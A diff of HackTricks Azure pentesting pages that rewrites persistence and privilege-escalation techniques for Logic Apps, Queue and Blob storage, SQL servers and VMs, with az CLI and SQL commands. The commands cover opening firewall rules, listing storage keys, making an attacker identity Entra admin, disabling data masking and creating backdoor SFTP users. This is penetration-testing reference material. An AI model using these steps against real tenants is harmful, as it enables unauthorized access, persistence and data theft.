-- Create an authorization policy allowing your tenant to trigger the workflow
+- Logic Apps HTTP actions can authenticate with an assigned managed identity for a selected audience, and request-trigger callback URLs carry a SAS that authenticates trigger invocation.<sup>[[1]](#references)[[2]](#references)</sup> Backdoor an existing workflow, or create one that uses a privileged managed identity to call protected resources and send the results to an endpoint you control, then retain the callback URL so you can trigger it later.
+- For Consumption workflows, an authorization policy can authorize inbound OAuth calls by matching token claims such as issuer and audience.<sup>[[1]](#references)</sup> Add or modify a policy so that a token from a tenant you control satisfies the expected claims, preserving another way to trigger the workflow.
 
+## References
+
+- [1] [Secure access and data in workflows - Azure Logic Apps](https://learn.microsoft.com/en-us/azure/logic-apps/logic-apps-securing-a-logic-app)
+- [2] [Authenticate workflow connections to protected Azure resources by using managed identities in Azure Logic Apps](https://learn.microsoft.com/en-us/azure/logic-apps/authenticate-with-managed-identity)
 
 {{#include ../../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistence.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-queue-persistence.md
@@ -1,7 +1,5 @@
 # Az - Queue Storage Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Queue
 
 For more information check:
@@ -10,24 +8,36 @@ For more information check:
 ../az-services/az-queue.md
 {{#endref}}
 
-### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
+### `Microsoft.Storage/storageAccounts/queueServices/queues/write`
 
-This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
+This data action authorizes **Create Queue** and **Set Queue Metadata**. It does not authorize changing a queue ACL or operating on queue messages: those operations use separate actions. An attacker can therefore create an unauthorized queue or overwrite user-defined metadata, potentially interfering with applications or automation that trust queue names or metadata.<sup>[[1]](#references)</sup>
+
+The Azure CLI supports creating a queue and replacing its metadata as follows. `--auth-mode login` makes the commands use the current Microsoft Entra credentials rather than attempting to retrieve an account key.<sup>[[2]](#references)</sup>
 
 ```bash
-az storage queue create --name <new-queue-name> --account-name <storage-account>
+az storage queue create --name <new-queue-name> --account-name <storage-account> --auth-mode login
 
-az storage queue metadata update --name <queue-name> --metadata key1=value1 key2=value2 --account-name <storage-account>
+az storage queue metadata update --name <queue-name> --metadata key1=value1 key2=value2 --account-name <storage-account> --auth-mode login
+```
 
-az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
+{% hint style="warning" %}
+Creating a stored access policy changes the queue ACL and therefore isn't authorized by the queue `write` action. Microsoft Entra authorization maps this operation to `Microsoft.Storage/storageAccounts/queueServices/queues/setAcl/action`. The current `az storage queue policy create` command instead accepts an account key, SAS, or connection string and doesn't expose `--auth-mode login`; it requires both a policy name and queue name, and queue policy permissions use the letters `a` (add), `p` (process), `r` (read), and `u` (update).<sup>[[1]](#references)[[3]](#references)</sup>
+{% endhint %}
+
+```bash
+az storage queue policy create \
+    --name <policy-name> \
+    --queue-name <queue-name> \
+    --permissions apru \
+    --expiry <YYYY-MM-DDTHH:MM:SSZ> \
+    --account-name <storage-account> \
+    --account-key <storage-account-key>
 ```
 
 ## References
 
-- [https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues](https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues)
-- [https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api](https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api)
-- [https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes](https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes)
+- [1] [Authorize with Microsoft Entra ID - Azure Storage](https://learn.microsoft.com/en-us/rest/api/storageservices/authorize-with-azure-active-directory)
+- [2] [az storage queue - Azure CLI](https://learn.microsoft.com/en-us/cli/azure/storage/queue?view=azure-cli-latest)
+- [3] [az storage queue policy - Azure CLI](https://learn.microsoft.com/en-us/cli/azure/storage/queue/policy?view=azure-cli-latest)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/azure-security/az-persistence/az-sql-persistence.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-sql-persistence.md
@@ -1,7 +1,5 @@
 # Az - SQL Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## SQL
 
 For more information check:
@@ -12,12 +10,17 @@ For more information check:
 
 ### Common Persistence Techniques
 
-- Compromise SQL credentials or create an SQL user (enabling SQL auth if needed)
-- Assign a compromised user as Entrad ID administrator (enabling Entra ID auth if needed)
-- Backdoor in the VM (if SQL VM is used)
-- Create a FW rule to maintain access over the SQL database
+- Retain compromised SQL authentication credentials, or create a new login or contained user when SQL authentication is allowed.<sup>[[1]](#references)[[2]](#references)</sup>
+- Assign a compromised identity as the logical server's Microsoft Entra administrator, which enables Microsoft Entra authentication and gives that identity administrative access.<sup>[[1]](#references)[[3]](#references)</sup>
+- If SQL Server is deployed on an Azure VM, use guest-OS persistence techniques against the underlying VM.<sup>[[4]](#references)</sup>
+- Create a server-level or database-level firewall rule to preserve network reachability to the database.<sup>[[5]](#references)</sup>
 
+## References
+
+- [1] [Authorize database access to Azure SQL Database](https://learn.microsoft.com/en-us/azure/azure-sql/database/logins-create-manage?view=azuresql)
+- [2] [Microsoft Entra-only authentication with Azure SQL](https://learn.microsoft.com/en-us/azure/azure-sql/database/authentication-azure-ad-only-authentication?view=azuresql)
+- [3] [Set-AzSqlServerActiveDirectoryAdministrator](https://learn.microsoft.com/en-us/powershell/module/az.sql/set-azsqlserveractivedirectoryadministrator?view=azps-15.6.0)
+- [4] [What is Azure SQL?](https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql)
+- [5] [IP Firewall Rules - Azure SQL Database](https://learn.microsoft.com/en-us/azure/azure-sql/database/firewall-configure?view=azuresql)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
@@ -1,8 +1,6 @@
 # Az - Storage Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
-## Storage Privesc
+## Storage persistence
 
 For more information about storage check:
 
@@ -12,33 +10,41 @@ For more information about storage check:
 
 ### Common tricks
 
-- Keep the access keys
-- Generate SAS
-  - User delegated are 7 days max
+- Retain storage account access keys. When Shared Key authorization is allowed, anyone who has an account key can authorize requests against the account and effectively access all of its data.<sup>[[1]](#references)</sup>
+- Generate SAS tokens with the required scope and lifetime. Account and service SAS tokens are signed with an account key, while a user delegation SAS is signed with Microsoft Entra credentials and cannot have an expiry interval longer than seven days.<sup>[[1]](#references)[[2]](#references)</sup>
 
-### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write
+### Microsoft.Storage/storageAccounts/blobServices/write
 
-These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information.
+The current Azure permission catalog maps this action to updating Blob service properties.<sup>[[3]](#references)</sup> An attacker with this permission can enable container soft delete and set its retention period from 1 to 365 days, creating a window in which a subsequently deleted container and its contents can be restored.<sup>[[4]](#references)</sup> The corresponding Azure CLI command is:<sup>[[4]](#references)[[5]](#references)</sup>
 
 ```bash
 az storage account blob-service-properties update \
   --account-name <STORAGE_ACCOUNT_NAME> \
+  --resource-group <RESOURCE_GROUP> \
   --enable-container-delete-retention true \
   --container-delete-retention-days 100
 ```
 
 ### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
 
-These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information.
+The first action returns storage account information, and the second returns its access keys.<sup>[[3]](#references)</sup> If Shared Key authorization is enabled, a retrieved key gives access to the account's data and can be used to update the Blob service's soft-delete policy. Blob soft delete retains deleted or overwritten objects for 1 to 365 days and allows them to be restored during that period.<sup>[[1]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 az storage blob service-properties delete-policy update \
   --account-name <STORAGE_ACCOUNT_NAME> \
+  --account-key <STORAGE_ACCOUNT_KEY> \
   --enable true \
   --days-retained 100
 ```
 
+## References
+
+- [1] [Authorize access to data in Azure Storage](https://learn.microsoft.com/en-us/azure/storage/common/authorize-data-access)
+- [2] [Configure an expiration policy for shared access signatures](https://learn.microsoft.com/en-us/azure/storage/common/sas-expiration-policy)
+- [3] [Azure permissions for Storage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage)
+- [4] [Enable and manage soft delete for containers](https://learn.microsoft.com/en-us/azure/storage/blobs/soft-delete-container-enable)
+- [5] [az storage account blob-service-properties](https://learn.microsoft.com/en-us/cli/azure/storage/account/blob-service-properties?view=azure-cli-latest)
+- [6] [Soft delete for blobs](https://learn.microsoft.com/en-us/azure/storage/blobs/soft-delete-blob-overview)
+- [7] [az storage blob service-properties delete-policy](https://learn.microsoft.com/en-us/cli/azure/storage/blob/service-properties/delete-policy?view=azure-cli-latest)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
@@ -1,7 +1,5 @@
 # Az - VMs Persistence
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## VMs persistence
 
 For more information about VMs check:
@@ -10,19 +8,28 @@ For more information about VMs check:
 ../az-services/vms/
 {{#endref}}
 
-### Backdoor VM applications, VM Extensions & Images <a href="#backdoor-instances" id="backdoor-instances"></a>
+### Backdoor VM applications, VM Extensions & Images <a href="#backdoor-vm-applications-vm-extensions-images" id="backdoor-vm-applications-vm-extensions-images"></a>
 
-An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed.
+VM Application versions contain application packages and their install, update, and remove commands, and organizations can deploy or enforce them across VM fleets. VM extensions can also run against existing VMs, and the Linux Custom Script extension can execute Bash scripts. An attacker who can publish a trusted application version or alter an extension deployment could therefore turn normal fleet management into repeated code execution.<sup>[[1]](#references)[[2]](#references)</sup>
+
+Likewise, VMs created from an Azure Compute Gallery image version receive disks copied from that image. A tainted version selected by deployment automation could propagate a backdoor to newly created VMs.<sup>[[3]](#references)</sup>
 
 ### Backdoor Instances <a href="#backdoor-instances" id="backdoor-instances"></a>
 
-An attacker could get access to the instances and backdoor them:
+After obtaining guest or control-plane access, an attacker could backdoor an instance by:
 
-- Using a traditional **rootkit** for example
-- Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html))
-- Backdooring the **User Data**
+- Installing a traditional **rootkit**, for example.
+- Adding a new **public SSH key**. Azure's VMAccess-backed `az vm user update` operation appends the supplied key to the administrative user's `~/.ssh/authorized_keys` file without removing existing keys.<sup>[[4]](#references)</sup>
+- Backdooring **custom data** or **user data** that trusted provisioning or startup logic consumes. Custom data can be processed by a provisioning agent during first boot; user data persists for the VM lifetime, can be changed externally without a reboot, and is available to applications through the Instance Metadata Service.<sup>[[5]](#references)[[6]](#references)</sup>
+
+## References
+
+- [1] [Overview of Azure VM Applications in the Azure Compute Gallery](https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications)
+- [2] [Azure VM Extensions and Features for Linux](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/features-linux)
+- [3] [Store and share images in an Azure Compute Gallery](https://learn.microsoft.com/en-us/azure/virtual-machines/shared-image-galleries)
+- [4] [Reset access to an Azure Linux VM](https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/vmaccess-linux)
+- [5] [Custom data on Azure virtual machines](https://learn.microsoft.com/en-us/azure/virtual-machines/custom-data)
+- [6] [User Data for Azure Virtual Machine](https://learn.microsoft.com/en-us/azure/virtual-machines/user-data)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
@@ -1,7 +1,5 @@
 # Az - SQL Database Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## SQL Database Privesc
 
 For more information about SQL Database check:
@@ -12,7 +10,7 @@ For more information about SQL Database check:
 
 ### `Microsoft.Sql/servers/read` && `Microsoft.Sql/servers/write`
 
-With these permissions, a user can perform privilege escalation by updating or creating Azure SQL servers and modifying critical configurations, including administrative credentials. This permission allows the user to update server properties, including the SQL server admin password, enabling unauthorized access or control over the server. They can also create new servers, potentially introducing shadow infrastructure for malicious purposes. This becomes particularly critical in environments where "Microsoft Entra Authentication Only" is disabled, as they can exploit SQL-based authentication to gain unrestricted access.
+`Microsoft.Sql/servers/read` returns server properties, while `Microsoft.Sql/servers/write` can create a logical server or update an existing server's properties. If Microsoft Entra-only authentication is disabled, an attacker with the write permission can reset the SQL administrator password and then authenticate with that account. The same permission can also create a new server controlled through attacker-chosen SQL credentials.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 # Change the server password
@@ -27,10 +25,10 @@ az sql server create \
   --resource-group <resource_group_name> \
   --location <location> \
   --admin-user <admin_username> \
-  --admin-password <admin_passwor d>
+  --admin-password <admin_password>
 ```
 
-Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
+To reach the public endpoint, public network access must be enabled and the source must also be allowed by a server-level firewall rule. Otherwise, use an authorized private endpoint path.<sup>[[2]](#references)[[5]](#references)</sup>
 
 ```bash
 az sql server update \
@@ -39,24 +37,25 @@ az sql server update \
   --enable-public-network true
 ```
 
-Furthermore, with the permissions you can enalbe the assign identity, an opertate with the managed identity attached to the server. For example here with a managed identity that can access Azure Storage:
+The write permission also permits enabling the logical server's system-assigned identity. This does not grant the caller the identity's permissions or automatically grant that identity access to another resource: impact depends on which SQL feature consumes the identity and on the Azure or Microsoft Graph permissions already granted to it. Assigning an existing user-assigned identity additionally requires `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`.<sup>[[2]](#references)[[4]](#references)</sup>
 
 ```bash
 az sql server update \
   --name <server-name> \
   --resource-group <resource-group> \
-    --assign_identity
+  --assign-identity
 ```
-```sql 
-CREATE DATABASE SCOPED CREDENTIAL [ManagedIdentityCredential]
-WITH IDENTITY = 'Managed Identity';
-GO
 
+If that identity already has access to an Azure Blob Storage container and the attacker also obtains a sufficiently privileged SQL data-plane session, Azure SQL Database can use the managed identity through a database-scoped credential and `OPENROWSET`.<sup>[[9]](#references)</sup>
+
+```sql
+CREATE DATABASE SCOPED CREDENTIAL [ManagedIdentityCredential]
+WITH IDENTITY = 'MANAGED IDENTITY';
+GO
 
 CREATE EXTERNAL DATA SOURCE ManagedIdentity
 WITH (
-    TYPE = BLOB_STORAGE,
-    LOCATION = 'https://<storage-account>.blob.core.windows.net/<container>',
+    LOCATION = 'abs://<container>@<storage-account>.blob.core.windows.net/',
     CREDENTIAL = ManagedIdentityCredential
 );
 GO
@@ -72,95 +71,101 @@ GO
 
 ### `Microsoft.Sql/servers/firewallRules/write`
 
-An attacker can manipulate firewall rules on Azure SQL servers to allow unauthorized access. This can be exploited to open up the server to specific IP addresses or entire IP ranges, including public IPs, enabling access for malicious actors. This post-exploitation activity can be used to bypass existing network security controls, establish persistence, or facilitate lateral movement within the environment by exposing sensitive resources.
+This permission can create, update, or overwrite server-level IPv4 firewall rules. An attacker can therefore allow a controlled public IP or range, provided public network access is enabled, and use that path to reach databases for which they have valid credentials.<sup>[[1]](#references)[[5]](#references)</sup>
 
 ```bash
 # Create Firewall Rule
 az sql server firewall-rule create \
-    --name <new-firewall-rule-name> \
-    --server <server-name> \
-    --resource-group <resource-group> \
-    --start-ip-address <start-ip-address> \
-    --end-ip-address <end-ip-address>
+  --name <new-firewall-rule-name> \
+  --server <server-name> \
+  --resource-group <resource-group> \
+  --start-ip-address <start-ip-address> \
+  --end-ip-address <end-ip-address>
 
 # Update Firewall Rule
 az sql server firewall-rule update \
-    --name <firewall-rule-name> \
-    --server <server-name> \
-    --resource-group <resource-group> \
-    --start-ip-address <new-start-ip-address> \
-    --end-ip-address <new-end-ip-address>
+  --name <firewall-rule-name> \
+  --server <server-name> \
+  --resource-group <resource-group> \
+  --start-ip-address <new-start-ip-address> \
+  --end-ip-address <new-end-ip-address>
 ```
 
-Additionally, `Microsoft.Sql/servers/outboundFirewallRules/delete` permission lets you delete a Firewall Rule.
-NOTE: It is necesary to have the public access enabled
+`Microsoft.Sql/servers/outboundFirewallRules/delete` is a separate permission: it deletes an outbound FQDN allow-list entry and may disrupt egress, but it does not remove or open an inbound server-level IP firewall rule.<sup>[[1]](#references)</sup>
 
 ### `Microsoft.Sql/servers/ipv6FirewallRules/write`
 
-With this permission, you can create, modify, or delete IPv6 firewall rules on an Azure SQL Server. This could enable an attacker or authorized user to bypass existing network security configurations and gain unauthorized access to the server. By adding a rule that allows traffic from any IPv6 address, the attacker could open the server to external access."
+This permission can create, update, or overwrite IPv6 firewall rules; `Microsoft.Sql/servers/ipv6FirewallRules/delete` deletes them. An attacker can add an allowed IPv6 source or range when public network access is enabled, but the rule alone does not provide database credentials.<sup>[[1]](#references)[[6]](#references)</sup>
 
 ```bash
-az sql server firewall-rule create \
+az sql server ipv6-firewall-rule create \
   --server <server_name> \
   --resource-group <resource_group_name> \
   --name <rule_name> \
-  --start-ip-address <start_ipv6_address> \
-  --end-ip-address <end_ipv6_address>
+  --start-ipv6-address <start_ipv6_address> \
+  --end-ipv6-address <end_ipv6_address>
 ```
-
-Additionally, `Microsoft.Sql/servers/ipv6FirewallRules/delete` permission lets you delete a Firewall Rule.
-NOTE: It is necesary to have the public access enabled
 
 ### `Microsoft.Sql/servers/administrators/write` && `Microsoft.Sql/servers/administrators/read`
 
-With this permissions you can privesc in an Azure SQL Server environment accessing to SQL databases and retrieven critical information. Using the the command below, an attacker or authorized user can set themselves or another account as the Azure AD administrator. If "Microsoft Entra Authentication Only" is enabled you are albe to access the server and its instances. Here's the command to set the Azure AD administrator for an SQL server:
+The read permission retrieves the configured Microsoft Entra administrator, and the write permission adds or updates that administrator. An attacker can set an identity they control as the server's Microsoft Entra administrator and then use that identity's token to access the SQL data plane, subject to network reachability.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 az sql server ad-admin create \
   --server <server_name> \
   --resource-group <resource_group_name> \
   --display-name <admin_display_name> \
-  --object-id <azure_subscribtion_id>
+  --object-id <entra_object_id>
 ```
 
 ### `Microsoft.Sql/servers/azureADOnlyAuthentications/write` && `Microsoft.Sql/servers/azureADOnlyAuthentications/read`
 
-With these permissions, you can configure and enforce "Microsoft Entra Authentication Only" on an Azure SQL Server, which could facilitate privilege escalation in certain scenarios. An attacker or an authorized user with these permissions can enable or disable Azure AD-only authentication.
+The write permission can enable or disable Microsoft Entra-only authentication, while the read permission retrieves its current state. Enabling the setting disables SQL authentication and requires a Microsoft Entra administrator to be configured; disabling it permits SQL authentication again but does not reveal or reset any SQL credentials.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
-#Enable
-az sql server azure-ad-only-auth enable \
-  --server <server_name> \
+# Enable
+az sql server ad-only-auth enable \
+  --name <server_name> \
   --resource-group <resource_group_name>
 
-#Disable
-az sql server azure-ad-only-auth disable \
-  --server <server_name> \
+# Disable
+az sql server ad-only-auth disable \
+  --name <server_name> \
   --resource-group <resource_group_name>
 ```
 
-### Microsoft.Sql/servers/databases/dataMaskingPolicies/write
-Modify (or disable) the data masking policies on your SQL databases.
+### `Microsoft.Sql/servers/databases/dataMaskingPolicies/write`
+
+This permission can change a database's dynamic data masking policy, including disabling it. The current REST API accepts `Enabled` or `Disabled` as the policy state.<sup>[[1]](#references)[[7]](#references)</sup>
 
 ```bash
 az rest --method put \
-  --uri "https://management.azure.com/subscriptions/<your-subscription-id>/resourceGroups/<your-resource-group>/providers/Microsoft.Sql/servers/<your-server>/databases/<your-database>/dataMaskingPolicies/Default?api-version=2021-11-01" \
+  --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.Sql/servers/<server>/databases/<database>/dataMaskingPolicies/Default?api-version=2025-01-01" \
   --body '{
     "properties": {
-      "dataMaskingState": "Disable"
+      "dataMaskingState": "Disabled"
     }
   }'
 ```
 
-### Remove Row Level Security
-If you loggin as admin, you can remove the policies of the admin itself and other users.
+### Remove Row-Level Security
+
+A data-plane principal with `ALTER ANY SECURITY POLICY` and `ALTER` on the policy's schema can drop a row-level security policy, removing its filter and block predicates.<sup>[[8]](#references)</sup>
 
 ```sql
 DROP SECURITY POLICY [Name_of_policy];
 ```
 
+## References
+
+- [1] [Azure permissions for Databases](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/databases)
+- [2] [az sql server](https://learn.microsoft.com/en-us/cli/azure/sql/server?view=azure-cli-latest)
+- [3] [Microsoft Entra-only authentication with Azure SQL](https://learn.microsoft.com/en-us/azure/azure-sql/database/authentication-azure-ad-only-authentication?view=azuresql)
+- [4] [Managed identities in Microsoft Entra for Azure SQL](https://learn.microsoft.com/en-us/azure/azure-sql/database/authentication-azure-ad-user-assigned-managed-identity?view=azuresql)
+- [5] [IP firewall rules for Azure SQL Database](https://learn.microsoft.com/en-us/azure/azure-sql/database/firewall-configure?view=azuresql)
+- [6] [az sql server ipv6-firewall-rule](https://learn.microsoft.com/en-us/cli/azure/sql/server/ipv6-firewall-rule?view=azure-cli-latest)
+- [7] [Data Masking Policies - Create Or Update](https://learn.microsoft.com/en-us/rest/api/sql/data-masking-policies/create-or-update?view=rest-sql-2025-01-01)
+- [8] [DROP SECURITY POLICY (Transact-SQL)](https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-security-policy-transact-sql?view=sql-server-ver17)
+- [9] [OPENROWSET BULK (Transact-SQL)](https://learn.microsoft.com/en-us/sql/t-sql/functions/openrowset-bulk-transact-sql?preserve-view=true&view=sql-server-ver17)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
@@ -1,7 +1,5 @@
 # Az - Storage Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Storage Privesc
 
 For more information about storage check:
@@ -12,7 +10,7 @@ For more information about storage check:
 
 ### `Microsoft.Storage/storageAccounts/listkeys/action`
 
-A principal with this permission will be able to list (and the secret values) of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
+This action returns the storage account access keys. When Shared Key authorization is enabled, either account key can authorize access to the account's data, so a principal that can list the keys can bypass narrower Microsoft Entra data-plane grants. If Shared Key authorization is disabled, requests signed with those keys are rejected.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 az storage account keys list --account-name <acc-name>
@@ -20,9 +18,7 @@ az storage account keys list --account-name <acc-name>
 
 ### `Microsoft.Storage/storageAccounts/regenerateKey/action`
 
-A principal with this permission will be able to renew and get the new secret value of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
-
-Moreover, in the response, the user will get the value of the renewed key and also of the not renewed one:
+This action rotates one named access key. The response is a list-keys result and includes the values of both the regenerated and unchanged account keys, so the caller obtains usable Shared Key credentials when that authorization method is enabled. Rotation can also disrupt clients that still use the old key.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 az storage account keys renew --account-name <acc-name> --key key2
@@ -30,55 +26,68 @@ az storage account keys renew --account-name <acc-name> --key key2
 
 ### `Microsoft.Storage/storageAccounts/write`
 
-A principal with this permission will be able to create or update an existing storage account updating any setting like network rules or policies.
+This action can create a storage account or update its properties, including security-relevant settings. For example, changing the default network action to `Allow` permits traffic from all networks, while adding an IP rule can expose the account to an attacker-controlled address.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ```bash
 # e.g. set default action to allow so network restrictions are avoided
 az storage account update --name <acc-name> --default-action Allow
 
 # e.g. allow an IP address
-az storage account update --name <acc-name> --add networkRuleSet.ipRules value=<ip-address>
+az storage account network-rule add \
+  --account-name <acc-name> \
+  --resource-group <resource-group> \
+  --ip-address <ip-address>
 ```
 
 ## Blobs Specific privesc
 
 ### `Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write` | `Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete`
 
-The first permission allows to **modify immutability policies** in containers and the second to delete them.
+The first action creates or replaces a container immutability policy, and the second deletes one. An unlocked retention policy can be modified or deleted; after it is locked, it cannot be shortened or deleted, although its retention interval can still be lengthened a limited number of times.<sup>[[1]](#references)[[5]](#references)</sup>
 
 > [!NOTE]
-> Note that if an immutability policy is in lock state, you cannot do neither of both
+> The documented Azure CLI modification flow uses `extend`, obtains the policy ETag first, and supplies it with `--if-match`.
 
 ```bash
+etag=$(az storage container immutability-policy show \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --container-name <CONTAINER_NAME> \
+  --query etag \
+  --output tsv)
+
+# Option 1: delete an unlocked policy
 az storage container immutability-policy delete \
   --account-name <STORAGE_ACCOUNT_NAME> \
   --container-name <CONTAINER_NAME> \
-  --resource-group <RESOURCE_GROUP>
+  --resource-group <RESOURCE_GROUP> \
+  --if-match "$etag"
 
-az storage container immutability-policy update \
+# Option 2: extend an existing policy
+az storage container immutability-policy extend \
   --account-name <STORAGE_ACCOUNT_NAME> \
   --container-name <CONTAINER_NAME> \
   --resource-group <RESOURCE_GROUP> \
-  --period <NEW_RETENTION_PERIOD_IN_DAYS>
+  --period <NEW_RETENTION_PERIOD_IN_DAYS> \
+  --if-match "$etag"
 ```
 
 ## File shares specific privesc
 
 ### `Microsoft.Storage/storageAccounts/fileServices/takeOwnership/action`
 
-This should allow a user having this permission to be able to take the ownership of files inside the shared filesystem.
+This grants the Azure Files take-ownership privilege.<sup>[[1]](#references)</sup>
 
 ### `Microsoft.Storage/storageAccounts/fileServices/fileshares/files/modifypermissions/action`
 
-This should allow a user having this permission to be able to modify the permissions files inside the shared filesystem.
+This permits modifying permissions on a file or folder in a file share.<sup>[[1]](#references)</sup>
 
 ### `Microsoft.Storage/storageAccounts/fileServices/fileshares/files/actassuperuser/action`
 
-This should allow a user having this permission to be able to perform actions inside a file system as a superuser.
+This grants file-administrator privileges for operations in a file share.<sup>[[1]](#references)</sup>
 
 ### `Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read)`
 
-With this permission, an attacker can create and update (if has `Microsoft.Storage/storageAccounts/localusers/read` permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the user’s permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data.
+The `localusers/write` action creates or updates a local user; `localusers/read` lets the principal inspect existing users first. A principal can assign container permission scopes such as read (`r`), write (`w`), delete (`d`), and list (`l`), choose a home directory, and configure an Azure-generated password or an SSH public key. Because the operation also updates users, an existing local-user definition can be replaced. SFTP requires the storage account's hierarchical namespace to be enabled.<sup>[[1]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 az storage account local-user create \
@@ -87,12 +96,15 @@ az storage account local-user create \
   --name <LOCAL_USER_NAME> \
   --permission-scope permissions=rwdl service=blob resource-name=<CONTAINER_NAME> \
   --home-directory <HOME_DIRECTORY> \
-  --has-ssh-key false/true # Depends on the auth method to use
+  --has-ssh-password true
+
+# For key authentication, use --has-ssh-key true together with
+# --ssh-authorized-key key="ssh-rsa <PUBLIC_KEY_DATA>" instead.
 ```
 
 ### `Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action`
 
-With this permission, an attacker can regenerate the password for a local user in an Azure Storage account. This grants the attacker the ability to obtain new authentication credentials (such as an SSH or SFTP password) for the user. By leveraging these credentials, the attacker could gain unauthorized access to the storage account, perform file transfers, or manipulate data within the storage containers. This could result in data leakage, corruption, or malicious modification of the storage account content.
+This action regenerates the SSH password of a local user. A principal with the action can obtain new credentials and use whatever container permissions are assigned to that user, including file transfer or data modification permissions.<sup>[[1]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 az storage account local-user regenerate-password \
@@ -101,34 +113,40 @@ az storage account local-user regenerate-password \
   --name <LOCAL_USER_NAME>
 ```
 
-To access Azure Blob Storage via SFTP (is_hns_enabled should be true) using a local user via SFTP you can (you can also use ssh key to connect):
+For local-user SFTP authentication, the username is `<storage-account-name>.<local-user-name>` and the connection uses the Blob service endpoint. Password and SSH-key authentication are both supported.<sup>[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 sftp <storage-account-name>.<local-user-name>@<storage-account-name>.blob.core.windows.net
 #regenerated-password
 ```
 
-### `Microsoft.Storage/storageAccounts/restoreBlobRanges/action`, `Microsoft.Storage/storageAccounts/blobServices/containers/read`, `Microsoft.Storage/storageAccounts/read` && `Microsoft.Storage/storageAccounts/listKeys/action`
+### `Microsoft.Storage/storageAccounts/restoreBlobRanges/action`
 
